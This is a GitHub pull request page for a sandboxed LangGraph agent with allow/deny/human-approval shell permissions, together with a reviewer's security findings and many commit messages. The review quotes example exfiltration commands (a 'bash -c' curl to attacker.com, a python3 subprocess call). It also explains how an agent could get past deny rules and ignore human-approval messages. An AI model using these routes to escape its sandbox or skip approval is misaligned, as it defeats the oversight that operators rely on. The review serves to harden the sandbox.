Skip to content

feat: add sandbox_agent with per-context workspace isolation#126

Draft
Ladas wants to merge 203 commits intokagenti:mainfrom
Ladas:feat/sandbox-agent
Draft

feat: add sandbox_agent with per-context workspace isolation#126
Ladas wants to merge 203 commits intokagenti:mainfrom
Ladas:feat/sandbox-agent

Conversation

@Ladas
Copy link
Contributor

@Ladas Ladas commented Feb 17, 2026

Summary

  • New sandbox_agent LangGraph agent with sandboxed shell execution
  • settings.json three-tier permission checker (allow/deny/HITL)
  • sources.json capability declaration (registries, remotes, runtime limits)
  • Per-context workspace manager on shared RWX PVC
  • Sandbox executor with timeout enforcement
  • Shell, file_read, file_write tools for LangGraph
  • A2A server with streaming support

Tests

68 unit tests passing (permissions, sources, workspace, executor, graph)

Design Doc

See docs/plans/2026-02-14-agent-context-isolation-design.md in kagenti/kagenti repo

🤖 Generated with Claude Code

Copy link
Contributor

@pdettori pdettori left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Security & Completeness Review

Three issues identified — two security-critical and one enforcement gap. Details in inline comments below.

"shell(tree:*)", "shell(pwd:*)", "shell(mkdir:*)", "shell(cp:*)",
"shell(mv:*)", "shell(touch:*)",
"shell(python:*)", "shell(python3:*)", "shell(pip install:*)",
"shell(pip list:*)", "shell(sh:*)", "shell(bash:*)",
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

🔴 Critical: Shell interpreter allow-rules bypass all deny rules

The allow list grants shell(bash:*), shell(sh:*), shell(python:*), and shell(python3:*) unconditionally. Because _match_shell() in permissions.py performs prefix-only matching on the command string, a command like:

bash -c "curl http://attacker.com/exfil"
python3 -c "import subprocess; subprocess.run(['curl', ...])"

will match shell(bash:*) / shell(python3:*) in the allow list, while the deny rules shell(curl:*) and shell(wget:*) only match commands that start with curl or wget. The network(outbound:*) deny rule is typed as network, but the executor only ever calls permission_checker.check("shell", operation) — there is no code path that checks outbound network at the OS/syscall level.

This is a complete sandbox escape: any denied command can be trivially executed as a subprocess of an allowed interpreter.

Suggested fix: Either (a) remove bash/sh/python/python3 from the blanket allow-list and whitelist specific scripts instead, or (b) add recursive argument inspection in _match_shell() for interpreter commands (detecting -c flags, pipe chains, etc.), or (c) use OS-level enforcement (seccomp, network policies) as a second layer.

try:
result = await executor.run_shell(command)
except HitlRequired as exc:
return f"APPROVAL_REQUIRED: command '{exc.command}' needs human approval."
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

🔴 Critical: HITL has no hard interrupt — LLM can bypass approval

The HitlRequired exception is caught here and converted to a plain string ("APPROVAL_REQUIRED: ...") returned to the LLM. There is no interrupt() call (LangGraph's mechanism for pausing the graph and requiring human input). The graph construction in build_graph() uses tools_condition and ToolNode but never calls interrupt().

This means the agent loop continues after receiving this string, and the LLM is free to:

  1. Ignore the approval message entirely
  2. Attempt a workaround command (e.g., rewriting the denied command using an allowed shell interpreter — see Issue 1)
  3. Simply not relay the approval request to the user

The docstrings in executor.py and permissions.py state that HITL "triggers LangGraph interrupt() for human approval," but the actual implementation relies on LLM self-reporting. This is not a security control — it is advisory at best.

Suggested fix: Replace the except HitlRequired handler with a proper LangGraph interrupt() call that pauses the graph execution and requires explicit human approval before resuming.

self.ttl_days = ttl_days

# ------------------------------------------------------------------
# Public API
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

🔴 No TTL enforcement or workspace cleanup

ttl_days is accepted here and written into .context.json metadata (line 91), but there is no implementation that ever reads this value back or acts on it. Specifically:

  • No cleanup job, eviction logic, or scheduled task
  • No delete_workspace() method exists
  • No comparison of created_at + ttl_days against current time
  • disk_usage_bytes is tracked passively but never checked against any quota
  • The only public methods are get_workspace_path(), ensure_workspace(), and list_contexts()

On a shared RWX PVC in a multi-tenant Kubernetes environment, this means workspaces accumulate indefinitely, creating both a resource exhaustion risk and a data retention compliance gap.

Suggested fix: Either (a) implement a cleanup_expired() method and wire it into a CronJob or startup hook, or (b) explicitly document ttl_days as advisory/future-only and add a tracking issue for enforcement.

entry = managers.get(manager)
if entry is None:
return False
blocked: list[str] = entry.get("blocked_packages", [])
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

🟡 is_package_blocked() and is_git_remote_allowed() are never called in production code

These methods (and is_package_manager_enabled()) are defined and unit-tested but never wired into the executor or graph. In production code, only the following SourcesConfig members are used:

  • is_web_access_enabled() — called in graph.py:_make_web_fetch_tool
  • is_domain_allowed() — called in graph.py:_make_web_fetch_tool
  • max_execution_time_seconds — used in executor.py:_execute

This means:

  • pip install <blocked-package> will succeed if shell(pip install:*) is in the allow list — the blocked_packages list in sources.json is never consulted
  • git clone <disallowed-remote> will succeed if shell(git clone:*) is in the allow list — allowed_remotes in sources.json is never checked
  • max_memory_mb is also defined but never enforced

The sources.json capability layer was clearly designed as a second enforcement layer, but it is not wired up to the shell execution path.

Suggested fix: Either (a) add pre-execution hooks in the executor that call is_package_blocked() / is_git_remote_allowed() for matching commands, or (b) explicitly document these as "advisory only / planned for future iteration" and file tracking issues.

@Ladas Ladas force-pushed the feat/sandbox-agent branch from 04f7cd5 to 2816bd3 Compare February 25, 2026 10:05
Ladas added a commit to Ladas/agent-examples that referenced this pull request Feb 25, 2026
…L cleanup, sources enforcement

Address all 4 security findings from pdettori's review on PR kagenti#126:

1. Shell interpreter bypass (Critical): Add recursive argument inspection
   in PermissionChecker.check_interpreter_bypass() to detect -c/-e flags
   in bash/sh/python invocations. Embedded commands are checked against
   deny rules, preventing `bash -c "curl ..."` from bypassing `shell(curl:*)`
   deny rules.

2. HITL no interrupt() (Critical): Replace `except HitlRequired` string
   return with LangGraph `interrupt()` call that pauses graph execution.
   The agent cannot continue until a human explicitly approves via the
   HITLManager channel.

3. No TTL enforcement (Medium): Add `cleanup_expired()` method to
   WorkspaceManager. Reads created_at + ttl_days from .context.json and
   deletes expired workspace directories. Add `get_total_disk_usage()`.

4. sources.json not wired (Medium): Add `_check_sources()` pre-hook in
   SandboxExecutor.run_shell(). Checks pip/npm install commands against
   blocked_packages list and git clone URLs against allowed_remotes
   before execution.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Ladas and others added 19 commits February 26, 2026 16:06
Weather agent with ONLY auto-instrumentation - no custom middleware,
no observability.py, no root span creation. The AuthBridge ext_proc
creates the root span with all MLflow/OpenInference/GenAI attributes.

Agent changes from pre-PR-114 baseline:
- __init__.py: Add W3C Trace Context propagation + OpenAI auto-instr
- agent.py: Remove duplicate LangChainInstrumentor (moved to __init__)
- pyproject.toml: Add opentelemetry-instrumentation-openai
- Dockerfile: Use Docker Hub base image (GHCR auth fix)

Zero custom observability code - all root span attributes come from
the AuthBridge ext_proc gRPC server.

Refs kagenti/kagenti#667

Signed-off-by: Ladas <lsmola@redhat.com>
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Without ASGI/Starlette instrumentation, the agent's OTEL SDK never
reads the traceparent header from incoming HTTP requests. This causes
the AuthBridge ext_proc root span and agent LangChain spans to end
up in separate disconnected traces.

StarletteInstrumentor().instrument() patches Starlette to automatically
extract traceparent from incoming requests, making all agent spans
children of the ext_proc root span (same trace_id).

Refs kagenti/kagenti#667

Signed-off-by: Ladas <lsmola@redhat.com>
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
New LangGraph agent with:
- settings.json three-tier permission checker (allow/deny/HITL)
- sources.json capability declaration (registries, remotes, limits)
- Per-context workspace manager on shared RWX PVC
- Sandbox executor with timeout enforcement
- Shell, file_read, file_write tools for LangGraph
- A2A server with streaming support

68 tests passing.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Agents can now fetch content from URLs whose domain is in the
sources.json allowed_domains list (github.com, api.github.com, etc).
Blocked domains are checked first. HTML content is stripped to text.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Serialize LangChain messages via model_dump() and json.dumps() instead
of Python str(). This produces valid JSON that the ext_proc can parse
to extract GenAI semantic convention attributes (token counts, model
name, tool names) without regex.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Without a checkpointer, LangGraph discards conversation state between
invocations even when the same context_id/thread_id is used. This adds
a shared MemorySaver instance to SandboxAgentExecutor and passes the
thread_id config to graph.astream() so the checkpointer can route state
per conversation thread.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
…L cleanup, sources enforcement

Address all 4 security findings from pdettori's review on PR kagenti#126:

1. Shell interpreter bypass (Critical): Add recursive argument inspection
   in PermissionChecker.check_interpreter_bypass() to detect -c/-e flags
   in bash/sh/python invocations. Embedded commands are checked against
   deny rules, preventing `bash -c "curl ..."` from bypassing `shell(curl:*)`
   deny rules.

2. HITL no interrupt() (Critical): Replace `except HitlRequired` string
   return with LangGraph `interrupt()` call that pauses graph execution.
   The agent cannot continue until a human explicitly approves via the
   HITLManager channel.

3. No TTL enforcement (Medium): Add `cleanup_expired()` method to
   WorkspaceManager. Reads created_at + ttl_days from .context.json and
   deletes expired workspace directories. Add `get_total_disk_usage()`.

4. sources.json not wired (Medium): Add `_check_sources()` pre-hook in
   SandboxExecutor.run_shell(). Checks pip/npm install commands against
   blocked_packages list and git clone URLs against allowed_remotes
   before execution.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
C19 (multi-conversation isolation):
- Add startup cleanup of expired workspaces via cleanup_expired()
- Wire context_ttl_days from Configuration into WorkspaceManager

C20 (sub-agent spawning via LangGraph):
- Add subagents.py with two spawning modes:
  - explore: in-process read-only sub-graph (grep, read_file, list_files)
    bounded to 15 iterations, 120s timeout
  - delegate: out-of-process SandboxClaim stub for production K8s clusters
- Wire explore and delegate tools into the main agent graph
- Update system prompt with sub-agent tool descriptions

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Address code review findings:

1. Interpreter bypass now routes to HITL when embedded commands are not
   explicitly denied — prevents auto-allowing unknown commands wrapped
   in bash -c / sh -c via the outer shell(bash:*) allow rule.

2. Parse &&, ||, ; shell metacharacters in embedded commands, not just
   pipes. Catches "bash -c 'allowed && curl evil.com'" patterns.

3. Replace str().startswith() path traversal checks with
   Path.is_relative_to() across graph.py and subagents.py to prevent
   prefix collision attacks (/workspace vs /workspace-evil).

4. Guard against None approval in interrupt() resume — use
   isinstance(approval, dict) check.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Add langgraph-checkpoint-postgres and asyncpg dependencies. Agent uses
AsyncPostgresSaver when CHECKPOINT_DB_URL is set, falls back to
in-memory MemorySaver for dev/test without Postgres.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Replace InMemoryTaskStore with a2a-sdk's DatabaseTaskStore (PostgreSQL)
when TASK_STORE_DB_URL is set. This is A2A-generic — works for any
agent framework (LangGraph, CrewAI, AG2), not just LangGraph.

The A2A SDK persists tasks, messages, artifacts, and contextId at the
protocol level. Any A2A agent can adopt this with the same env var.

Falls back to InMemoryTaskStore when no DB URL is configured.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Update the A2A agent card name, skill ID, and workspace agent_name
from sandbox-assistant/Sandbox Assistant to sandbox-legion/Sandbox Legion.

The Python package name (sandbox_agent) stays unchanged as it's an
implementation detail, not user-facing.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
The DatabaseTaskStore is in a2a.server.tasks, not
a2a.server.tasks.sql_store. The incorrect import path
caused the agent to silently fall back to InMemoryTaskStore.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
AsyncPostgresSaver.from_conn_string() returns a context manager
that can't be used in sync __init__. Instead, create an asyncpg
pool and initialize the saver lazily in execute() on first call.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Both asyncpg pool (checkpointer) and SQLAlchemy engine (TaskStore)
need SSL disabled when connecting to the in-cluster postgres-sessions
StatefulSet which doesn't have TLS configured.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
LangGraph's AsyncPostgresSaver uses psycopg3, not asyncpg.
Create AsyncConnectionPool from psycopg_pool and pass to saver.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
The from_conn_string context manager properly handles connection
pool setup and autocommit for CREATE INDEX CONCURRENTLY.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
@Ladas Ladas force-pushed the feat/sandbox-agent branch from ac7ba86 to 36cfc18 Compare February 26, 2026 15:06
Ladas and others added 5 commits February 26, 2026 18:42
When models like gpt-4o-mini return content as a list of content blocks
(text + tool_use), the previous code would stringify the entire list.
Now properly extracts only text-type blocks for the final artifact.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
- Per-context_id asyncio.Lock serializes graph execution for same
  conversation (prevents stuck submitted tasks from concurrent requests)
- Shell interpreter bypass detection: catches bash -c/python -c
  patterns and recursively checks inner commands against permissions
  and sources policy
- TOFU verification on startup: hashes CLAUDE.md/sources.json,
  warns on mismatch (non-blocking)
- HITL interrupt() design documented in graph.py with implementation
  roadmap for graph-level approval flow
- Lock cleanup when >1000 idle entries to prevent memory leaks

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Agent now emits structured JSON events instead of Python str()/repr().
Each graph event is serialized with type, tools/name/content fields.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
…sk history

Agent serializer: when LLM calls tools, also emit its reasoning text
as a separate llm_response event before the tool_call. This shows the
full chain: thinking → tool_call → tool_result → response.

Backend history: aggregate messages across ALL task records for the
same context_id. A2A protocol creates immutable tasks per message
exchange, so a multi-turn session has N task records. We now merge
them in order with user message deduplication.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
…nnections

Stale asyncpg connections caused 'connection was closed in the middle
of operation' errors, breaking SSE streams. Now connections are recycled
every 5 min and verified before use.

Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Ladas added 30 commits March 13, 2026 23:22
Instead of one reflection prompt at the end, inject a HumanMessage
after every ToolMessage in the executor's context window:

  AIMessage(tool_call: shell(gh run list --head ...))
  ToolMessage("STDERR: unknown flag: --head\nEXIT_CODE: 1")
  HumanMessage("Tool 'shell' call 1 FAILED. Error: unknown flag.
    Goal: 'List CI failures'. Try DIFFERENT approach. NEVER repeat.")

  AIMessage(tool_call: shell(gh run list --branch main))
  ToolMessage("completed  failure  feat: Enable UI...  18762918767")
  HumanMessage("Tool 'shell' call 2 OK. Goal: 'List CI failures'
    — if ACHIEVED → stop. NEVER repeat same command.")

This forces the LLM to reflect after each result, preventing the
loop of 10x identical shell(gh run list) calls.

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
- List INVALID flags explicitly: --head, --head-ref, --pr, --pull-request
- Add gh pr checks <number> to reference
- Reflection prompt after "unknown flag" error tells LLM to run --help
- Suggest using --branch or gh pr checks instead of invented flags

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
…mpts

Move gh CLI flag reference out of generic executor prompt — belongs
in rca:ci skill. Keep only generic guidelines: run --help on unknown
flags, check stderr, don't repeat same result.

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
When iteration > 1, the planner serializer emits replanner_output
instead of planner_output. This lets the UI render replan as a
distinct node (not replacing the initial plan).

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
The executor→tools→executor cycle is one logical unit. Don't
increment node_visit when the same node type re-enters (executor
after tools returns to executor). Only increment on node TYPE
transitions (executor→reflector, reflector→planner, etc).

This groups all tool calls + micro-reasonings for one plan step
under a single collapsible UI section.

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Remove tool_choice="any" — use implicit auto (field omitted).
Per vllm-tool-choice-auto-issue.md research, implicit auto gives
best results for Llama 4 Scout (100% structured) and allows the
model to produce text-only reasoning responses when the step is
complete, instead of forcing a tool call every time.

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Testing explicit auto vs implicit (omitted) vs any. The research
doc shows explicit and implicit auto can behave differently.

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Extract tool schemas from LLM's RunnableBinding and include in
LLMCallCapture.debug_fields(). The UI prompt inspector now shows
exactly which tools the LLM received alongside the messages.

Removes duplicate _bound_tools capture from executor node.

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
TESTED both explicit and implicit auto with Llama 4 Scout:
- Implicit auto: 0/54 structured tool_calls (all text-in-content)
- Explicit auto: 0/58 structured tool_calls (all text-in-content)
- Any/required: 100% structured tool_calls

The vLLM endpoint does not produce structured tool_calls with auto
for Llama 4 Scout. "any" forces JSON schema constraint at decoding.

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Connect the wizard "Force Tool Calling" toggle to the graph's
tool_choice setting. When SANDBOX_FORCE_TOOL_CHOICE=1 (default
from wizard), executor uses tool_choice="any" (structured calls).
When =0, uses implicit auto (model chooses text or tools).

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
When SANDBOX_FORCE_TOOL_CHOICE=1:
  Phase 1: LLM with implicit auto → text reasoning about what to do
  Phase 2: LLM with tool_choice="any" → structured tool call

The reasoning from Phase 1 becomes the micro_reasoning content
(real text, not just "Decided next action: → shell(...)").

Also: skip first SystemMessage in _summarize_messages (already
shown as _system_prompt — was appearing twice in UI).

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
With tools bound, Llama 4 Scout always produces structured tool_calls
even with implicit auto — defeating the two-phase purpose. Fix: Phase 1
uses bare LLM (no bind_tools) which forces text-only output.

Phase 2 always runs with tool_choice="any" for structured calls.

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Remove plan, plan_step, reflection legacy aliases from:
- Serializer: no longer emits duplicate events
- Post-processing: no legacy type special handling
- Tests: 6 legacy tests removed

Each event type has one canonical name only:
  planner_output, executor_step, tool_call, tool_result,
  micro_reasoning, reflector_decision, reporter_output,
  step_selector, budget_update, replanner_output

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
When _no_tool_count >= 2, the executor was discarding the actual LLM
response (with text reasoning) and replacing it with a hardcoded
failure message. Now preserves the model's output for micro_reasoning
display and includes capture.debug_fields() for prompt inspector.

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
- invoke_with_tool_loop: up to THINKING_ITERATION_BUDGET (default 5) bare
  LLM iterations before each micro-reasoning tool call
- Each thinking iteration sees tool descriptions as text + previous
  thinking history (ephemeral, not in LangGraph state)
- MAX_THINK_ACT_CYCLES replaces MAX_TOOL_CALLS_PER_STEP (counts full
  think→act loops, not individual tool calls)
- MAX_PARALLEL_TOOL_CALLS (default 5) allows parallel tool execution
- Sub-events emitted as 'thinking' type with full prompt debug data
- Serializer annotates micro_reasoning with thinking_count for UI badge
- All LLM nodes (planner, executor, reflector, reporter) use invoke_llm
  with workspace preamble and bound_tools capture

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
StepSelector imported _format_llm_response from reasoning.py which was
removed during the P0 unified invoke_llm refactoring. Replace with
LLMCallCapture._format_response() from context_builders.

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
LangGraph stream_mode="updates" only includes keys defined in the
state schema. _sub_events (thinking iterations) was missing from
SandboxState, so thinking events were silently dropped from the
stream and never reached the serializer or UI.

Also adds _last_tool_result, _bound_tools, _llm_response to state
for consistent debug data availability.

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
- step_done tool: LLM calls it when step is complete, intercepted in
  invoke_with_tool_loop to return text-only (no forced tool call)
- Fix double WORKSPACE_PREAMBLE: skip preamble in thinking/micro-reasoning
  calls since messages already have it from build_executor_context
- Remove duplicate tool descriptions injection (executor prompt has them)
- Truncate thinking history to 200 chars per iteration (save tokens)
- Micro-reasoning calls ONE tool (not up to 5)

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
- Thinking prompts: "2-3 sentences max" instead of verbose reasoning
- Micro-reasoning: parallel tools only for independent operations
- Never call same tool twice with similar args
- step_done for completed steps

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Indexed hash of indexed hashes for main steps and subplans:
- create_plan: initial plan with subplan "a" per step
- add_steps: replanner-only, requires all existing steps terminal
- add_alternative_subplan: creates subplan b/c/d for failed steps
- Status transitions: pending → running → done|failed|cancelled (one-way)
- to_flat_plan/to_flat_plan_steps: backward compat conversions
- 30 unit tests covering all operations and invariants

Not yet wired into reasoning nodes — next session will integrate.

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
- planner_node: creates PlanStore via ps.create_plan() alongside flat plan
- reflector_node: updates PlanStore step status on continue/done/replan/retry
- reporter_node: reads plan from PlanStore (falls back to flat plan)
- step_selector: marks current PlanStore step as running
- SandboxState: adds _plan_store dict field
- event_serializer: enriches planner/reflector events with PlanStore data
- Fixes variable shadowing of ps module import (ps -> _ps, cur_ps, etc.)
- Wraps set_step_status in try/except for replan key mismatches
- _force_done() now propagates _plan_store to prevent state loss

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Rename local `ps = plan_steps[current_step]` to `step_entry` in
_serialize step_selector branch to avoid shadowing the plan_store
module import.

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
…inking tuning

- Reflector: increase max pairs from 3 to 10, add step execution summary
  (tool calls, tools used, error count) to reflector system prompt
- Reporter: add thinking+tool loop with read-only tools (file_read, grep,
  glob) for file verification. Extract files_touched from tool history.
- Prompt visibility: add _prompt_messages to executor edge cases (cycle
  limit, budget exceeded) and step_selector for complete UI debug info
- Thinking tuning: MAX_THINK_ACT_CYCLES 10→20, THINKING_ITERATION_BUDGET 5→2
- Event serializer: include files_touched in reporter_output events
- Update reflector context tests for new 10-pair limit

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
…ernally

- invoke_with_tool_loop now supports max_cycles + tools parameters
- When tools provided: executes tools via asyncio.gather (parallel),
  feeds results back, loops for next think-act cycle
- Any node can use the full loop (not just executor via graph topology)
- Reporter uses max_cycles=3 with read-only tools for file verification
- Removed reporter_tools graph node (tools run inside invoke_with_tool_loop)
- MAX_THINK_ACT_CYCLES default raised to 20

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
- executor_node now passes tools and max_cycles=MAX_THINK_ACT_CYCLES
  to invoke_with_tool_loop, running the full think→tool→result→think
  loop internally instead of relying on graph topology
- Strip tool_calls from final response after internal execution so
  the graph doesn't re-execute them via ToolNode
- Each cycle now produces thinking + micro-reasoning + tool execution

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
When invoke_with_tool_loop executes tools internally, emit proper
tool_call sub_events BEFORE execution and tool_result sub_events
AFTER execution. The serializer now handles all three sub_event
types: thinking, tool_call, tool_result.

This restores tool call visibility in the UI that was lost when
tool execution moved from graph topology to internal loop.

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Executor back to max_cycles=1 (graph topology: executor→tools→executor).
Internal multi-cycle loop broke SSE streaming because tools executed
inside the node without emitting events. Reporter keeps internal loop
(max_cycles=3) since it's short-lived and doesn't need real-time streaming.

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
- Reflector: when all steps complete (next_step >= len(plan)), set
  done=True and route to reporter directly instead of looping through
  step_selector → executor → reflector again
- Reporter prompt: remove "use glob" instruction that Llama 4 Scout
  echoed verbatim. Add "do NOT echo these instructions" guard.
- Simplify report structure section

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
- max_iterations 100→200, max_tool_calls_per_step 10→20
- Reporter prompt: remove Report Structure section that LLM echoed,
  add "do NOT echo instructions" and "start directly with summary"
- List workspace file paths in full form

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

Status: Backlog

Development

Successfully merging this pull request may close these issues.

2 participants